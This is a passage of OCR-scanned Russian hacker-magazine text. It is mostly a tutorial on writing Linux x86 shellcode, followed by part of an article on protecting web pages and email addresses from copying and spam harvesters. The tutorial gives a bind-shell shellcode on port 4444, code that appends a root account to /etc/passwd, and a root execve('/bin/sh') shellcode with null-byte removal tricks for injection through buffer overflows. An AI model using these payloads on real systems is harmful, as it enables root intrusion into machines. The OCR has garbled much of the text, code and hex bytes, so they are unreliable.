ТЫ, И ДАЖЕ НЕ БУДУ РАЗБИРАТЬ ПОПУЛЯРНЫЕ УЯЗВИ- 
МОСТИ В СОФТЕ. НО ЗАТО С УДОВОЛЬСТВИЕМ НАУЧУ 
СОСТАВЛЯТЬ ШЕЛЛ-КОД, НЕОТЪЕМЛЕМУЮ ЧАСТЬ 
ПРАКТИЧЕСКИ ЛЮБОГО СПЛОИТАрр 
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ОТКУДА БЕРУТСЯ 
ШЕЛЛ-КОДЫ 

УЧИМСЯ ПИСАТЬ ШЕЛЛ-КОДЫ САМОСТОЯТЕЛЬНО 



КАК РАБОТАЕТ ЭКСПЛОЙТ 

Проведем небольшой эксперимент. Открой в текстовом редакто- 
ре исходник любого эксплойта, обещающего много всяких вкус- 
ностей, вроде гооі-шелла на удаленной машине, и найди в нем 
самый непонятный участок кода. Такой там будет практически на- 
верняка: смотри внимательнее и ты его найдешь. Скорее всего, 
тебе на глаза попадется несколько строчек непонятных и ничем 
не связанных между собой символов. Своеобразная последова- 
тельность байт в шестнадцатеричном формате, такая как эта: 

сііаг зііеІІсосіе[] = 

'\хЗЗ\хс9\х83\хе9\хеЬ\хсІ9\хее\хс19\х74\х24\х!4\х5Ь\х81\х73\х13\х8а" 
м \хсІ4\хТ2\хе7\х83\хе Ь\хТс\хе2\хТ4\хЬ Ь\х01\ха1 \ха4\хсІ 9\хЬе\хТ0\х8сІ " 
"\хес\х8с\х6Ь\х6е\х6Ь\х1 9\х72\х7 1 \хс9\х86\х94\х81\х9Ь\х88\х94\хЬ4" 
"\х03\х35\х98\х81 \хсІ2\х84\хаЗ\хЫ \х03\х35\х31\х67\хЗа\хЬ2\х23\х04" 
'\х47\х54\ха0\хЬ5\хсІс\х97\х7Ь\х06\хЗа\хЬ2\хЗ!\х67\х19\хЬе\хІ0\хЬе" 
'\хЗа\хеЬ\хЗ!\х67\хсЗ\хасІ\х0Ь\х57\х81\х86\х9а\хс8\ха5\ха7\х9а\х8Г 
м \ха5\хЬ6\х9Ь\х89\х03\х37\ха0\хЬ4\х03\х35\хЗ!\х67"; 

Это и есть тот самый шелл-код, о котором пойдет речь. Иногда 
его называют байт-кодом, так как он состоит из последователь- 
ности байтов, но суть от этого не меняется. Содержимое шелл- 
кода — отнюдь не хитрое заклинание и не символы, взятые от 
балды. Это набор самых обыкновенных машинных команд, точ- 
но таких же, как и в обычном исполняемом файле. Например, 
приведенный выше шелл-код (определенная последователь- 
ность машинных команд) открывает 4444 порт на локальной 
І_іпих-машине и привязывает к нему шелл. Эксплойт, которому 
удастся выполнить этот шелл-код, предоставит хакеру полный 
доступ в систему. 

С помощью шелл-кода можно также перезагрузить систему, отк- 
лючить ЮЗ-сервисы и Иопеуроі, отправить заданный файл на 
мыло и т.д. и т.п. Все зависит от того, что именно прописано в 
шелл-коде. Заставить компьютер выполнить шелл-код — задача 
эксплойта. Возьмем для примера распространенную ошибку 
ВиІІег ОѵегІІоѵѵ. Разработчики очень часто допускают оплош- 
ность и не проверяют данные, которые передаются функциям в 
качестве параметров. Банальный пример: программист создает 
динамический массив и выделяет память для 100 элементов, при 
этом реальное количество элементов нигде не контролируется. 
Такое положение дел играет на руку взломщику, потому как все 
данные, которые оказались за пределами этого массива, попа- 
дают в стек, происходит так называемое переполнение буфера. 



Задача эксплойта заключается в том, чтобы переполнить буфер 
и таким образом подменить адрес возврата на тот, где находит- 
ся шелл-код. Если шелл-код получит управление, то он будет вы- 
полнен. Все довольно просто. 

МЕСТО ДЕЙСТВИЯ 

Не стоит рассматривать этот материал как руководство к напи- 
санию эксплойтов. Цель этой статьи — на практике показать 
процесс создания шелл-кода, а также его оптимизации для ис- 
пользования в реальных сплоитах. Конечно, существует немало 
репозитариев (например, ѵѵѵѵѵѵ.теІазрІоіТсот ) с отличной под- 
боркой шелл-кодов, однако их не всегда бывает достаточно. Ты 
с самого начала должен понимать, что шелл-код — это последо- 
вательность машинных команд (самый низкий и сложный уро- 
вень программирования), которые сильно привязаны к конкрет- 
ной архитектуре процессора и операционной системы. Шелл- 
код, работающий в одном случае, будет совершенно неприме- 
ним в другом. Вот почему так важно понимать что к чему, чтобы 
в случае необходимости суметь составить работающий шелл- 
код самому или модифицировать уже существующий. 

Сразу хочу предупредить, что для полного понимания статьи не- 
обходимо иметь хотя бы минимальные знания ассемблера. На- 
деюсь, ты внимательно читал вводные статьи по теме в «Кодин- 
ге», так как в этом случае проблем не будет, и материал пока- 
жется простым и понятным. В качестве платформы для экспери- 
ментов мы выберем І_іпих на машине с 32-битным х86 процессо- 
ром. Предвижу твой резонный вопрос: почему І_іпих? Да потому, 
что большинство эксплойтов предназначено именно для ІІпіх- 
сервисов, а значит, представляют больший интерес. Для работы 
нам также понадобятся несколько вспомогательных инструмен- 
тов: Ыеіѵѵісіе АззетЫег (пазт), пбізазт и Нехбитр. В большин- 
стве дистрибутивов они поставляются по умолчанию, но даже 
самостоятельная установка вряд ли вызовет затруднения. Ссыл- 
ки на дистрибутивы ищи во врезке, хотя зачем? Все необходи- 
мое выложено на наш диск. 

ПРИМЕРА РАДИ 

Заготовки для шелл-кода обычно пишут на ассемблере. Однако мы 
построим процесс несколько иначе: сначала для лучшего понимания 
рассмотрим примеры на языке С, а уже потом — аналогичный код на 
ассемблере. Я намеренно рассмотрю два довольно простых приме- 
ра, чтобы не грузить тебя громоздкими выкладками, от которых все 
равно не будет толку. Очень скоро ты поймешь, что процесс создания 




Не стоит забывать, что за все незаконные действия ты несешь полную ответственность сначала перед собственной совестью, потом — 
перед близкими людьми, а потом уже — перед лысым 43-летним государственным обвинителем по Фамилии Петренко. Так что не глупи. 
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шѳлл-кода для более сложных действий ничем не отличается. 

Итак, первый пример. Он самый простой и заключается в том, 
что наша небольшая программа откроет для записи файл 
/ еіс/раззѵѵсі , добавит в конец строку <<хакер:х:0:0::/:/Ьіп/ЬазІі\п>>, 
после чего закроет его, сохранив результат. 

#іпсІисІе <зісііо.іі> 

#іпсІисІе сІспІІ.Ь 
таіп() 

{ 

сііаг *ІМепате = "/еІс/раззѵѵсГ; 
сИаг *1іпе = 

"хакер:х:0:0::/:/Ьіп/ЬазИ\п"; 
іпі 1_ореп; 

1_ореп = ореп(ТіІепате,0_Ѵ\/ВОЫІУІО_АРРЕЫО); 
ѵѵгіІе(1_ореп, Ііпе, зігіеп(ііпе)); 
сІозе(Т_ореп); 
ехіІ(О); 

} 

Приведенный код предельно прост и понятен, за исключением 
разве что функции ореп (открыть файл). Константа 0_ѴѴРіОІ\І- 
І_ѴІО_АРРЕІ\Ю, которая передается ей в качестве параметра, 
указывает на то, что файл открывается в режиме записи, а но- 
вые данные дописываются в его конец. 

Теперь рассмотрим более жизненный пример — запуск систем- 
ного интерпретатора (шелла). Мудрить особо не будем: станда- 
ртного /Ып/зіі нам хватит сполна. 



остальных функций: ехіІ() — 1, сІозе() — 6, зеігеиісІ() — 70, 
ехесѵе() — 11. В принципе, этого достаточно, чтобы написать 
вполне работоспособные приложения. 

зесііоп .сіаіа 

Іііепате сіЬ '/еІс/раззѵѵсГ, О 

Ііпе СІЬ 'хакер:х:0:0::/:/Ьіп/Ьа5Ь',0х0а 

зесііоп Тех! 

дІоЬаІ _зІагІ 

_5ІагІ: 

; ореп(1Иепате,0_Ш(ЖУ10_АРРЕШ) 



тоѵ 


еах, 


5 


тоѵ 


еЬх, 


ТМепате 


тоѵ 


есх, 


1025 


іпі 


0x80 




тоѵ 


еЬх, 


еах 


; ѵѵгі!:е(Т_ореп, Ііпе, 


24) 


тоѵ 


еах, 


4 


тоѵ 


есх, 


Ііпе 


тоѵ 


есіх, 


24 


іпі 


0x80 




; сІозе(Т_ореп) 




тоѵ 


еах, 


6 


іпі 


0x80 




; ехіІ(О) 
тоѵ 


еах, 


1 


тоѵ 


еЬх, 


0 


іпі 


0x80 






#іпсІисІе <зісііо.іі> 
таіп() 

{ 

сЬаг *пате[2]; 
пате[0] = УЬіп/зЬ"; 
пате[1] = І\ШІ_І_; 
зеІгеиіфО, 0); 

ехесѵе(пате[0],пате, ЫІІИ); 

//то же самое, что и ехесѵе("/Ьіп/зИ",{"/Ьіп/зІп",ЫІЛІ},МІЛІ) 

} 

Команда зе1теиісІ(0, 0) используется для того, чтобы установить 
для запуска права гооі'а (если это возможно). ехесѵе(сопзІ сбаг 
Іііепате, сііаг сопзі агдѵ [], сііаг сопзі епѵр[]) — это главный сис- 
темный вызов, который исполняет любые бинарники и скрипты. 
Он имеет 3 параметра: Іііепате — полный путь к бинарнику, агдѵ 
[] — массив аргументов, епѵр[] — массив строк в формате 
«ключ=значение», которые выставляются переменными окруже- 
ния для запускаемого приложения. Оба массива должны закан- 
чиваться нулевым (N1111) элементом. 

АССЕМБЛЕР — ПОЧТИ ПРОСТО 

Теперь, когда мы имеем несколько примеров, написанных на С, 
попробуем преобразовать их в код на чистом ассемблере. Тебе 
должно быть известно, что системные функции вызываются с 
помощью специального прерывания, которое считывает номер 
функции регистра ЕАХ и выполняет ее. Номера функций можно 
подсмотреть в файле /изг/іпсіисіе/азт/ипізісі.іі. Например, строка 

«#бе!іпе І\ІВ_ ореп 5» означает, что функции ореп() присвоен 

идентификационный номер 5. Аналогично находятся номера для 



Как известно, программа на ассемблере обычно состоит из 
трех сегментов: сегмента данных, в котором описываются пе- 
ременные, сегмента кода, в котором содержатся непосред- 
ственно инструкции программы, и сегмента стека, представля- 
ющего собой специальную область памяти для хранения дан- 
ных. Наш пример состоит из всего двух сегментов: данных и 
кода, начало которых обозначено управляющими операторами 
зесііоп .сіаіа и зесііоп .Іехі. Сегмент данных содержит объявле- 
ние двух переменных: пате и Ііпе, строкового типа, состоящих 
из набора байт (видишь слово сіЬ в описании?). Сегмент кода 
начинается с объявления точки входа в систему дІоЬаІ _зІагІ. 
Эта конструкция указывает на то, что инструкции программы 
следует выполнять с метки _зІагІ. Все логично: после этой мет- 
ки действительно идет вызов необходимых функций и проце- 
дур. Так, если необходимо вызвать функцию ореп(), то в ре- 
гистр ЕАХ помещается ее номер — 5. Затем функции переда- 
ются параметры. Вообще говоря, это можно сделать несколь- 
кими способами, но в нашем случае используется наиболее 
простой: с помощью регистров ЕВХ,ЕСХ,ЕЭХ. В ЕВХ помещает- 
ся первый параметр функции, то есть адрес начала строки 
пате, которая содержит путь к файлу и его имя, а также завер- 
шающий ноль (многие функции требуют, чтобы строковые пе- 
ременные заканчивались именно нулем). А в регистр ЕСХ зано- 
сится второй параметр, символизирующий режим для открытия 
файла (константа 0_ѴѴРЮІ\ІІ_ѴІО_АРРЕІ\Ю в численном предс- 
тавлении). Теперь, когда регистры содержат необходимые зна- 
чения, можно вызывать прерывание 0x80. Оно считает номер 
функции из регистра ЕАХ и выполняет функцию с соответству- 
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ющими параметрами. После этого выполнение основной прог- 
раммы продолжается, причем для вызова функции ѵѵгіІе(), 
сІозе(), ехіІ() используется тот же самый механизм. 

Теперь рассмотрим второй пример. 

зесііоп .сіаіа 
пате сІЬ ’/Ып/зМ', О 

зесііоп Техі 
дІоЬаІ _зІагІ 
_зіаі1: 



; зеІгеиіфО, 0) 




тоѵ 


еах, 


70 


тоѵ 


еЬх, 


0 


тоѵ 


есх, 


0 


іпі 


0x80 




; ехесѵе("/Ьіп/5Іі", 


["/Ьіп/зИ", 


тоѵ 


еах, 


11 


тоѵ 


еЬх, 


пате 


ризіі 


0 




ризіі 


пате 




тоѵ 


есх, 


езр 


тоѵ 


есіх, 


0 


іпі 


0x80 





І\ІІЛ_І_], І\ІІЛ_І_) 



Если не брать в расчет вызов функции ехесѵе(), то большая 
часть кода аналогична предыдущему примеру. Те же сегменты, 
тот же принцип вызова функции зе!геиіб(). Проблема лишь в 
том, что в качестве второго параметра подпрограммы ехесѵе() 
передается массив, состоящий из двух элементов. Такой пара- 
метр уместно передавать через стек, в который сначала поме- 
щается ноль (ризИ 0) , а потом адрес начала строки пате (ризб 
пате). Параметры передаются в обратном порядке неслучайно. 
Стек использует принцип ПРО (последним пришел — первым 
вышел), поэтому при извлечении данных из стека сначала бу- 
дет получен адрес переменной пате и лишь потом — ноль. 
Необходимо позаботиться о том, чтобы подпрограмма знала, 
где эти параметры искать, и в этом неоценимую помощь окажет 
специальный регистр ЕЗР (сокращение от Зіаск Роіпіег), кото- 
рый всегда указывает на адрес вершины стека. Все, что от нас 
требуется, — это скопировать содержимое регистра ЕЗР в ре- 
гистр ЕСХ, который при запуске 0x80 прерывания будет обра- 
ботан, как второй параметр функции. 



ПОЧЕМУ НЕТ? 

Полученный код на ассемблере работоспособен на все 100%. 
Его без труда можно откомпилировать с помощью пазгтГа, запус- 
тить и даже посмотреть бинарник в шестнадцатеричном редакто- 
ре, то есть получить готовый шелл-код. Одна лишь проблема: 
толку от такого шелл-кода будет немного. Обе программы ис- 
пользуют собственные сегменты данных, что полностью лишает 
возможности выполнить их внутри другого приложения. Это зна- 
чит, что эксплойт не сможет инжектировать требуемый код в стек 
и выполнить его. 

Именно поэтому следующим нашим шагом будет оптимизация 
программы на работу без использования сегмента данных. Для 
этого мы немного схитрим и воспользуемся одним приемом, ос- 
нованным на инструкциях ассемблера ітр (перейти на метку) 
и саІІ (вызвать процедуру). Обе инструкции осуществляют пере- 
ход в нужное место программы, но саІІ, помимо всего прочего, 
заносит в стек адрес возврата. Это необходимо для того, чтобы 
после завершения процедуры вернуться в исходное место 
программы и продолжить ее нормальное выполнение. Рассмот- 
рим суть приема на примере: 
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ВЗЛОМ ///// І551ІЕ 





ризИ 

ризИ 

ризИ 

ризИ 

тоѵ 



ѵѵогсі 0х0а21 
0х646с7261 
0х77202с6Т 
0х6с6с6568 
еЬх, езр 



Практически каждый эксплоит содержит 
несколько строчек шелл кода 



]ГТф ІѴѴО 



Программа на С, 

запускающая шелл-интерпретатор 



опе: 
рор еЬх 

[текст программы] 

Іѵѵо: 
саІІ опе 
сіЬ 'строка' 

В самом начале программы осуществляется переход на метку 



Строка заносится в стек с конца: 
сначала идет\п! (в шестнадцатерич- 
ном коде 0х0а21), потом сііго 
(0х646с7261), далее ѵѵ ,о (0х77202с6І) и НеИ (0х6с6с6568). В конце 
концов значение из регистра ЕЗР (адрес начала строки) заносится 
ЕВХ. Лихо? Этот способ более эффективен, так как существенно 
сокращает шелл-код, однако менее удобен. 

ПЕРВЫЙ ШЕЛЛ-КОД 

Теперь, когда мы научились обходиться без сегмента данных, 
можно приступить к созданию первого полноценного шелл-кода. 
Для этого нужно сначала откомпилировать исходный код прог- 
раммы на ассемблере: 

$ пазт зИеМ.азт 



Іѵѵо, за которой расположен вызов процедуры опе. На самом де- 
ле никакой процедуры нет, однако с таким именем есть еще од- 
на метка, которой и передается управление. В этот момент в 
стек заносится адрес возврата, то есть адрес следующей за саІІ 
инструкцией. В нашем случае это строка байт — 6Ь 'зігіпд 1 . По- 
лучается, что к моменту, когда начинается обработка метки опе, 
в стек уже будет помещен адрес начала строки. Нам остается 
лишь извлечь ее и использовать, как заблагорассудиться. Поп- 
робуем этим воспользоваться в реальной программе: для этого 
модифицируем наш второй пример. Для удобства назовем его 
зГіеІІ.азт, так как далее будем работать только с ним. 

ВІТ8 32 



И просмотреть полученный бинарник с помощью программы Нех- 
битр: 

$ Иехсіитр -С зЬеІІ 

Видишь скриншот? По сути дела это и есть шелл-код, только не- 
обходимо преобразовать его в соответствующий вид. Для этого 
перед каждым байтом допиши символ \х и без пробелов занеси 
в массив символов. Проверить его работоспособность можно с 
помощью такой несложной программы: 

сііаг сосІе[]= 

'\хЬ8\х46\х00\х00\х00\хЬЬ\х00\х00\х00\х00\хЬ9\х00\х00\х00\х00\хссі" 
'\х80\хе9\х15\х00\х00\х00\х5Ь\хЬ8\х0Ь\х00\х00\х00\х68\х00\х00\х00" 
'\х00\х53\х89\хе1\хЬа\х00\х00\х00\х00\хссІ\х80\хе8\хе6\хІ!\хІ!\хІІ" 
"\х2!\х62\х69\х6е\х2!\х7 3\х68\х00" ; 



; зеІгеиіфО, 0) 



тоѵ 


еах, 


70 


таіп() 


тоѵ 


еЬх, 


0 


{ 


тоѵ 


есх, 


0 


іпі (*зЬеІІ)(); 


іпі 


0x80 




(іпІ)зЬеІІ = сосіе; 
зЬеІІ(); 


Ітр 


Іѵѵо 




} 


опе: 








рор 


еЬх 




$ дсс -о зЬеІІ.с 
$ ./зЬеІІ.с 


; ехесѵе("/Ьіп/зЬ", 


[УЫп/зЬ", ІМІІЩ, ІМІІЩ 




тоѵ 


еах, 


11 


Все работает! 


ризЬ 


0 






ризЬ 


еЬх 




ЭТИ ЗЛЫЕ ІШЫ.-БАЙТЫ 


тоѵ 


есх, 


езр 


Спешу тебя огорчить. Несмотря на то, что шелл-код не ис- 


тоѵ 


есіх, 


0 


пользует сегмент данных и даже работает внутри програм- 


іпі 


0x80 




мы-тестера, использовать его в реальных эксплойтах пока 
нельзя. Виной тому нулевые байты (\х00), которые в изоби- 


Іѵѵо: 






лии присутствуют в шелл-коде. Большинство ошибок ВиІТег 


саІІ 


опе 




ОѵегІІоѵѵ и подобных связаны с использованием функции ра- 


сіЬ 


УЫп/зИ 1 , 0 


боты со строками: зігсруО, зргіп*І(), деіз(), зІгсаЦ) и т.д. Если 



Как видишь, никаких сегментов больше нет. Строка /Ып/зіі, ко- 
торая ранее хранилась в сегменте данных, теперь извлекается 
из стека в регистр ЕВХ. Кроме этого, добавилась новая дирек- 
тива ВІТЗ 32, отвечающая за оптимизацию для 32-битных про- 
цессоров. 

В принципе, можно было поступить иначе: самостоятельно за- 
нести в стек строку и извлечь ее с помощью указателя на вер- 
шину стека ЕЗР. Провернем такой финт со строкой «НеІІо, 
ѵѵогіб!»: 



попытаться использовать шелл-код в одной из таких уязви- 
мостей, переполнить буфер и инжектировать код с нулевы- 
ми байтами, то ничего хорошего не выйдет. Встретив нуле- 
вой байт, функция подумает, что встретила конец строки и 
не прочитает оставшуюся часть шелл-кода. 

От хакера требуется всеми силами избегать ситуации, когда в шелл- 
коде появляются нулевые байты. Этим мы, собственно, и займемся. 
Идея простая: найти те участки кода, которые порождают нуле- 
вые байты, и видоизменить их таким образом, чтобы комбинации 
\х00 в шелл-коде больше не встречалось. Опытный программист 
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Необходимые тѵлзы: 

Иазт ( пазт.зоигсеіогае.пеі ) 

Нехбито ( \л/\л/\л/.сапЬ.аииа.ога.аи/~тіІІего/бехбитр.бітІ) 




Коллекции шелл-кодов и документации по теме: 
Меіазоіоіі.сот 

раскеізіогтзесигііѵ.сот/збеіісобе 

\л/\л/\л/.збеІІсобе.ога 




в большинстве случаев легко может определить из-за чего в ма- 
шинном коде появляются нули, но нам, как новичкам, необходи- 
ма помощь дизассемблера. Воспользуемся пбізазт: 



$ па$т зііеіі.азт 
$ пбізазт зИеІІ.азт 

После выполнения этой команды на экран будет выведен дизас- 
семблированный код программы. Первый столбец — адрес 
инструкции, он для нас не особенно важен. Во втором столбце 
расположены машинные инструкции, точно такие же, как и при 
просмотре бинарника Гіехсіитр'ом. В третьем столбце для каж- 
дой машинной инструкции дан эквивалент на ассемблере. Толь- 
ко с помощью ассемблерного кода мы можем судить о том, отку- 
да взяли нулевые байты в шелл-коде. 

После беглого осмотра дампа становится ясно, что большинство 
І\ІІІЦ_-байтов связаны с инструкциями, которые управляют содержи- 
мым регистра и стека. Этого следовало ожидать, поскольку мы ра- 
ботаем в 32-битном режиме и, соответственно, для каждого числа 
выделяется 4 байта памяти. Мы же оперируем числами, для которых 
хватает и одного байта. Например, в самом начале программы зГіеІІ 
мы имеем следующую конструкцию «тоѵ еах, 70» (занести в ре- 
гистр еах число 70). В дампе и шелл-коде эта инструкция представ- 
лена как «В8 46 00 00 00». Причем В8 — это машинный эквивалент 
ассемблерной команды тоѵ ах, а В8 00 00 00 — число 70 в шест- 
надцатеричной системе счисления, дополненное нулями до разме- 
ра 4-х байт. Аналогично возникает еще множество ШІ_І_-байтов. 

К счастью, решить эту проблему будет проще простого. Доста- 
точно вспомнить, что 32-битные регистры (ЕАХ, ЕВХ и другие, на- 
чинающиеся с буквы е) можно разложить на регистры меньшей 
размерности. Посмотри на иллюстрацию и тебе сразу станет яс- 
но, что никто не мешает нам работать с двухбайтным регистром 
АХ, а также с его младшей и старшей частями АЬ и АН. Послед- 
ние имеют размер всего в один байт — как раз то, что нам надо. 
Нужно лишь заменить «тоѵ еах, 70» на «тоѵ аі, 70» и т.д. Важно 
позаботиться о том, чтобы остальная часть регистра не содержа- 
ла мусора. Быстро и эффективно обнулить значение всего реги- 
стра можно, воспользовавшись логической функцией «исключа- 
ющее или». Так, «хог еах, еах» обнулит значение регистра ЕАХ. 

ПРОБЛЕМЫ НЕ КОНЧАЮТСЯ 

Даже после внесенных изменений шелл-код все равно содержит 
нулевые байты. Отладчик показывает, что источник всех бед — 
инструкция ітр: 

Е91500 ]тр 0x29 

0000 асШ [Ьх+зі],аІ 

Тут есть одна хитрость: вместо обычной команды ітр нужно ис- 
пользовать инструкцию близкого перехода — ітр зГюШ В не- 
больших программах, имеющих простую структуру, эти инструк- 
ции абсолютно равноправны, однако машинный код во втором 
случае не содержит нулевых байтов. А именно это нам и надо. 
Казалось бы, все готово. Шелл-код должен быть идеальным, но 
нет! В нем по-прежнему остается один-единственный и подлый 
нуль-байт. Он находится в самом конце нашего шелл-кода и по- 
является там из-за того, что строка, содержащая путь к интерп- 
ретатору ('/Ьіп/зГГ, 0), заканчивается нулем. Как говорилось ра- 
нее, этот ноль необходим для правильной работы приложения 
(функции ехесѵе()). Просто взять и удалить его нельзя, как бы те- 
бе этого ни хотелось. Но можно воспользоваться еще одной хит- 
ростью: на этапе компоновки вместо нуля можно указать произ- 



вольный символ и превратить его в ноль лишь в процессе выпол- 
нения программы. Это делается примерно так: 

бтр зііоіі зіиіі 
сосіе: 

рор езі 

; адрес начала строки 
; теперь в регистре ЕЗІ 
хог еах, еах 

; обнуляем регистр ЕАХ 
тоѵ Ьуіе [езі + 17],аІ 

; отсчитываем 18 символов (нумерация с нуля) 

; и заносим туда ноль (регистр ЕАХ полностью 
; равен нулю) 

; Теперь строка превратиться в «ТЫз із ту зІгіпдО» 
зіиіі: 

саІІ сосіе 

сІЬ ТЫз із ту зігіпд#' 

Теперь применим этот прием по отношению к программе 
зГіеІІ.азт: 

ВИЗ 32 

;зеІгеиісІ(0, 0) 
хог еах, еах 

тоѵ аі, 70 

хог еЬх,еЬх 

хог есх,есх 

іпі 0x80 

Ітр зііогі Тлю 

опе: 

рор еЬх 

; ехе с ѵе ( "/Ь і п/з И " , [ "/Ь і п/з И " , ІМІІЩ, ІМІІЩ 

хог еах, еах 

тоѵ Ьуіе [еЬх+7], аі 

ризТі еах 

ризМ еЬх 

тоѵ есх, езр 

тоѵ аІ,11 

хог ебх,есІх 

ІЫ 0x80 

Тлю: 
саІІ опе 

6Ь '/Ып/зЫГ 

Откомпилировав программу, убеждаемся, что нулевых байтов 
больше нет. Стоит отменить, что проблема может возникнуть не 
только из-за нулей. Специальные символы (к примеру, символ 
конца строки) в некоторых случаях также могут стать причиной 
нулевых байтов в шелл-коде. 

К ДЕЙСТВИЮ 

В статье приведены наиболее важные приемы, которые понадобят- 
ся при составлении шелл-кодов. Однако для успеха недостаточно 
просто прочитать этот материал. Важно как можно глубже разоб- 
раться с операционной системой, под которую пишется шелл-код, 
а также программированием на ассемблере. Надеюсь, приведен- 
ные примеры убедили тебя в том, что ничего чрезвычайно сложно- 
го здесь нет. Все довольно просто и логично. Главное — не боятся 
открыть документацию и немного поэкспериментировать. 

ВІЫАВУ УОІІВ’8 ~Г 
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ТЕХТ ДОКУЧАЕВ ДМИТРИЙ АКА РОВВ / РОВВШЕАІ..ХАКЕР.ВІІ / 

ЛЦИ1%: 

■а, для» 

ѴѴЕВ-КОНТЕНТА 

МЕТОДЫ И ТЕХНОЛОГИИ ЗАЩИТЫ ѴѴЕВ-КОНТЕНТА 



іі ВОРОВСТВО В ГЛОБАЛЬНОЙ СЕТИ ЕЩЕ БОЛЕЕ РАЗВИТО, ЧЕМ В РЕАЛЬНОЙ 
ЖИЗНИ. В ИНТЕРНЕТЕ ВОРУЮТ ВСЕ: ПАРОЛИ, АСЬКИ, ПОЧТОВЫЕ АККАУНТЫ, ПЕ- 
РЕПИСКУ, ѴѴЕВ-ДИЗАЙН, КАРТИНКИ И ИСХОДНИКИ ДОРОГИХ ПРОГРАММ. ОЧЕНЬ 
СЛОЖНО ЗАЩИЩАТЬ ОТ КРАЖИ И НЕЗАКОННОГО ИСПОЛЬЗОВАНИЯ ТО, ЧТО ПО 
СВОЕЙ ПРИРОДЕ И СУЩНОСТИ ДОЛЖНО БЫТЬ ДОСТУПНО БОЛЬШОМУ ЧИСЛУ 
ЛЮДЕЙ. ОДНАКО СЛОЖНО — ЭТО НЕ СИНОНИМ СЛОВА «НЕВОЗМОЖНО». СЕГОД- 
НЯ МЫ НАУЧИМСЯ ЗАЩИЩАТЬ ОТ КРАЖИ НТМЬ-КОД СТРАНИЦ, КРАСИВУЮ ГРАФИ- 
КУ, КАРТИНКИ И ДАЖЕ ИСХОДНИКИ РНР-СИСТЕММ 



ЗАЩИТА ОТ САМЫХ МАЛЕНЬКИХ 

Множество пользователей так или иначе не хотят украсть непос- 
редственно дизайн. Они желают скопировать кусок текста, сох- 
ранить картинку или оставить себе на память НТМІ_-фрагмент. С 
такими юзерами мы и будем бороться в первую очередь, так как 
их большинство. 

Во-первых, если ты не желаешь, чтобы исходник страницы был 
просмотрен пользователем, то обязательно запрети ее кэширо- 
вание на диск. То есть после посещения пользователем ссылки, 
страница не будет сохраняться в кэше. Наверняка ты знаешь, 
как это сделать, но все же напомню тебе опцию, которая долж- 
на присутствовать в блоке <Иеаб></Иеаб>: 

<МЕТА НТТР-ЕОІЛѴ=СасІіе-СопІгоІ сопІепІ=по-сасІіе> 

Во-вторых, можно защититься ЗаѵаЗсгірГом, позволяющим 
запретить копирование текста с НТМІ_-страницы. Этот прием 
очень моден в наши дни, однако перед его применением заду- 
майся, не отпугнет ли он твоих посетителей. Если ты все же ре- 
шился на подобный способ — добавь в тот же блок заголовка 
следующий скрипт. 



<ЗСВІРТ І_АМ61ІА6Е=\іаѵаЗсгірГ> 
йоситепіопсігадзіагі = Іезі; 
сіоситепіопзеіесізіаіі = іезі; 
сіоситепіопсопіехітепи = ІезІ; 

Іипсііоп Іез1() { 
геіигп Таізе 
} 

</ЗСВІРТ> 

Три события, ссылающиеся на функцию ІезіО, следят за пере- 
таскиванием, выделением элементов, а также за вызовом конте- 
кстного меню. Как видишь, сама функция — обычная пустышка, 
возвращающая ложное значение. 

АДРЕСА В ОПАСНОСТИ 

В последнее время у злоумышленников появился нездоровый 
интерес к исходникам НТМІ_-страниц. Но он вызывается отнюдь 
не прелестями дизайна, а всего-то наличием е-таіі адресов. Я 
говорю про обычных спамеров, которые запускают паучка в 
просторы Интернета. Последний, проверяя каждую ссылку сай- 
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Несмотря на все обещания, некоторые программы шифруют НТМІ. так, что потом в некоторых браузерах наблюдаются глюки. В частности я обнару- 
жил, что после НТМІ. Роѵѵег у меня перестало работать навигационное меню на ЦаѵаЗсгірІ Причем в ІЕ таких глюков не наблюдалось. 



та, записывает все мыльники, которые там встречаются. Поэто- 
му мудрые дизайнеры изобрели ряд ухищрений, способных за- 
щитить от подобных напастей. 

Первый и самый простой способ защиты — использование ипі- 
собе-символов, которые понимают большинство браузеров. Для 
обычного пользователя этот адрес будет выглядеть нормально, но 
в исходниках НТМІ_-страницы он окажется закодированным. 
Рассмотрим простой пример. Допустим, на странице форума 
имеется е-таіі ІогЬ@геаІ.хакер.ш . Я не хочу, чтобы меня достава- 
ли спамеры (в ящик мне сыпется порядка 200 писем мусора каж- 
дый день :)), поэтому щедро поделился с автором борды спосо- 
бом ипісобе-кодирования. Итак, адрес представлен следующей 
строкой: 

<а Иге{=”ІогЬ@геаІ. хакер. ги”>ІогЬ@геаІ. хакер. ш</а>. 

Наша задача закодировать значение параметра ІлгеТ, так как 
именно его грабят спамерские пауки. Все символы можно заме- 
нить конструкцией &#І\ІІІМ;, где ШМ — какое-либо число. К при- 
меру, мой адрес можно закодировать так: 

f&#111 ;rb@r&#101 ;al& 
#46;&#1 20;a&#1 07;&#1 01 ;&#1 1 2;.&#1 1 4;&#1 1 7; 

Но может быть такое, что вражеский робот будет грабить поле 
текста (блок <ах/а>), поэтому на странице вообще не нужно све- 
тить никаких мыльников, а просто, скажем, заменить адрес ником 
на форуме. Вуа-ля, конструкция превратилась в нечто подобное: 



и почтовый домен. В функции проис- 
ходит слияние этой информации с 
«собакой», и на выходе получается 
вполне рабочий адрес. Подобную за- 
щиту обойти очень непросто, поэтому 
пауки просто игнорируют, то есть «не 
замечают» реальных адресов. 

Наконец можно попробовать модернизировать скрипт, включив 
в него какое-нибудь дополнительное кодирование, либо скрес- 
тить его с ипісобе-защитой. Здесь ты сам себе архитектор :). 

В наше время особую популярность завоевали языки РегІ и РНР, 
с помощью которых также можно защититься от виртуальных су- 
постатов. Первое, что приходит в голову, — это использовать 
несложный скрипт, который при регистрации участника заносил 
е-таіі в специальную базу. Каждый адрес должен иметь уни- 
кальный номер. Затем в качестве параметра «ИгеТ» помещается 
ссылка на скрипт с этим номером, а последний запускает почто- 
вую программу или просто отображает нужный адрес. Для при- 
мера напишу конструкцию, которая вполне может иметь место в 
твоей НТМІ_-страничке: 

<а ИгеТ=/сді-Ьіп/таіІ.рІ?31 337>Форб</а>. 

После клика по моему нику вызовется скрипт, который покажет 
е-таіі адрес или запустит почтовую программу (ѵѵеЬ-интерфейс) 
для отправки молебного письма :). 



КошріВіінііе сіміі^іікса 








подручное средство для кодирования адресов 



[в НАШЕ ВРЕМЯ 






НАЛШУ. 



<а 

ИгеТ=”&#1 02;&#1 1 1 ;&#1 1 4;b@&#1 1 4;&#1 01 ;a&#1 
